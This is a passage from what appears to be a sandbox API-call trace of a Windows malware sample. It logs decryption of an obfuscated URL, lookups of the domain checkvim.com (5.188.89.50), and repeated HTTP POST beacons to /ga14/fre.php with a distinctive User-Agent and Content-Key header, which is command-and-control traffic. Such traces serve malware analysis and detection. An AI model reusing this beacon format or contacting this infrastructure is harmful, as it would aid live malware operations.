pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0218.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.127] CryptDestroyKey (hKey=0x87e970) returned 1 [0218.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.129] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0218.129] GetProcessHeap () returned 0x840000 [0218.129] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0218.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.130] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0218.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.131] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0218.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.133] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0218.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.134] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0218.134] GetProcessHeap () returned 0x840000 [0218.134] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0218.134] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0218.134] GetProcessHeap () returned 0x840000 [0218.135] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0218.135] GetProcessHeap () returned 0x840000 [0218.135] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0218.135] GetProcessHeap () returned 0x840000 [0218.135] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0218.135] GetProcessHeap () returned 0x840000 [0218.135] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0218.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.136] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0218.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.145] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0218.152] GetProcessHeap () returned 0x840000 [0218.152] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0218.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.153] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0218.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.154] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0218.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.155] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.155] GetProcessHeap () returned 0x840000 [0218.155] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0218.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.156] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0218.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.157] CryptDestroyKey (hKey=0x87e930) returned 1 [0218.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.163] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0218.163] GetProcessHeap () returned 0x840000 [0218.163] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0218.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.165] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0218.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.166] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0218.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.168] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0218.168] GetProcessHeap () returned 0x840000 [0218.168] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0218.168] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0218.171] GetProcessHeap () returned 0x840000 [0218.172] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bb8 [0218.172] socket (af=2, type=1, protocol=6) returned 0x2b8 [0218.172] connect (s=0x2b8, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0218.244] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0218.244] GetProcessHeap () returned 0x840000 [0218.244] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0218.244] GetProcessHeap () returned 0x840000 [0218.244] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0218.245] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0218.246] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0218.246] GetProcessHeap () returned 0x840000 [0218.246] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0218.246] GetProcessHeap () returned 0x840000 [0218.246] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0218.246] GetProcessHeap () returned 0x840000 [0218.246] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7a0 [0218.246] GetProcessHeap () returned 0x840000 [0218.246] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0218.247] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0218.248] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0218.248] GetProcessHeap () returned 0x840000 [0218.248] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0218.248] GetProcessHeap () returned 0x840000 [0218.248] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0218.248] send (s=0x2b8, buf=0x873a58*, len=237, flags=0) returned 237 [0218.249] send (s=0x2b8, buf=0x87eb58*, len=159, flags=0) returned 159 [0218.249] GetProcessHeap () returned 0x840000 [0218.249] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0218.249] recv (in: s=0x2b8, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0218.613] GetProcessHeap () returned 0x840000 [0218.613] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0218.613] GetProcessHeap () returned 0x840000 [0218.613] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0218.613] GetProcessHeap () returned 0x840000 [0218.613] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0218.613] GetProcessHeap () returned 0x840000 [0218.613] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0218.613] closesocket (s=0x2b8) returned 0 [0218.616] GetProcessHeap () returned 0x840000 [0218.616] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bb8 | out: hHeap=0x840000) returned 1 [0218.616] GetProcessHeap () returned 0x840000 [0218.616] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0218.616] GetProcessHeap () returned 0x840000 [0218.616] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0218.616] GetProcessHeap () returned 0x840000 [0218.617] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0218.617] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x134c) returned 0x2b8 [0218.621] Sleep (dwMilliseconds=0xea60) [0218.622] GetProcessHeap () returned 0x840000 [0218.622] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa70 [0218.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.624] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0218.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.635] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0218.644] GetProcessHeap () returned 0x840000 [0218.644] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0218.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.645] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0218.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.646] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0218.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.665] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.665] GetProcessHeap () returned 0x840000 [0218.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0218.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.672] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa70, pdwDataLen=0x19f9a4 | out: pbData=0x87fa70, pdwDataLen=0x19f9a4) returned 1 [0218.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.673] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0218.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.674] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0218.674] GetProcessHeap () returned 0x840000 [0218.675] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0218.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.676] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0218.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.677] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0218.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.682] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0218.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.683] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0218.683] GetProcessHeap () returned 0x840000 [0218.683] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0218.684] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0218.684] GetProcessHeap () returned 0x840000 [0218.684] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0218.684] GetProcessHeap () returned 0x840000 [0218.684] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0218.684] GetProcessHeap () returned 0x840000 [0218.685] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0218.685] GetProcessHeap () returned 0x840000 [0218.685] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0218.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.686] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0218.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.696] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0218.704] GetProcessHeap () returned 0x840000 [0218.704] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0218.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.705] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5f0) returned 1 [0218.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.706] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0218.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.708] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.708] GetProcessHeap () returned 0x840000 [0218.708] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0218.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.709] CryptDecrypt (in: hKey=0x87e5f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0218.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.711] CryptDestroyKey (hKey=0x87e5f0) returned 1 [0218.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0218.712] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0218.712] GetProcessHeap () returned 0x840000 [0218.712] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0218.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.713] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0218.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.716] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0218.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.717] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0218.717] GetProcessHeap () returned 0x840000 [0218.717] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0218.717] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0218.730] GetProcessHeap () returned 0x840000 [0218.730] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c88 [0218.730] socket (af=2, type=1, protocol=6) returned 0x2bc [0218.731] connect (s=0x2bc, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0218.810] FreeAddrInfoW (pAddrInfo=0x8713d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0218.810] GetProcessHeap () returned 0x840000 [0218.810] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f710 [0218.810] GetProcessHeap () returned 0x840000 [0218.810] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0218.811] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0218.812] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0218.812] GetProcessHeap () returned 0x840000 [0218.812] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0218.812] GetProcessHeap () returned 0x840000 [0218.812] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0218.812] GetProcessHeap () returned 0x840000 [0218.812] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fa28 [0218.813] GetProcessHeap () returned 0x840000 [0218.813] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0218.813] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0218.814] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0218.814] GetProcessHeap () returned 0x840000 [0218.814] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0218.814] GetProcessHeap () returned 0x840000 [0218.814] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0218.814] send (s=0x2bc, buf=0x873a58*, len=237, flags=0) returned 237 [0218.815] send (s=0x2bc, buf=0x87eb58*, len=159, flags=0) returned 159 [0218.815] GetProcessHeap () returned 0x840000 [0218.815] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0218.815] recv (in: s=0x2bc, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0219.175] GetProcessHeap () returned 0x840000 [0219.175] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0219.175] GetProcessHeap () returned 0x840000 [0219.175] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0219.175] GetProcessHeap () returned 0x840000 [0219.175] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0219.175] GetProcessHeap () returned 0x840000 [0219.175] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f710 | out: hHeap=0x840000) returned 1 [0219.175] closesocket (s=0x2bc) returned 0 [0219.176] GetProcessHeap () returned 0x840000 [0219.176] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c88 | out: hHeap=0x840000) returned 1 [0219.176] GetProcessHeap () returned 0x840000 [0219.176] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0219.176] GetProcessHeap () returned 0x840000 [0219.176] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0219.176] GetProcessHeap () returned 0x840000 [0219.176] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0219.176] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xe88) returned 0x2bc [0219.178] Sleep (dwMilliseconds=0xea60) [0219.179] GetProcessHeap () returned 0x840000 [0219.179] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0219.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.193] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0219.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.202] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0219.210] GetProcessHeap () returned 0x840000 [0219.210] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0219.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.212] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e830) returned 1 [0219.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.213] CryptSetKeyParam (hKey=0x87e830, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0219.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.214] CryptSetKeyParam (hKey=0x87e830, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.214] GetProcessHeap () returned 0x840000 [0219.214] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0219.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.216] CryptDecrypt (in: hKey=0x87e830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0219.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.217] CryptDestroyKey (hKey=0x87e830) returned 1 [0219.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.218] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0219.218] GetProcessHeap () returned 0x840000 [0219.218] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0219.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.220] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0219.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.221] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0219.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.226] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0219.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.227] StrStrA 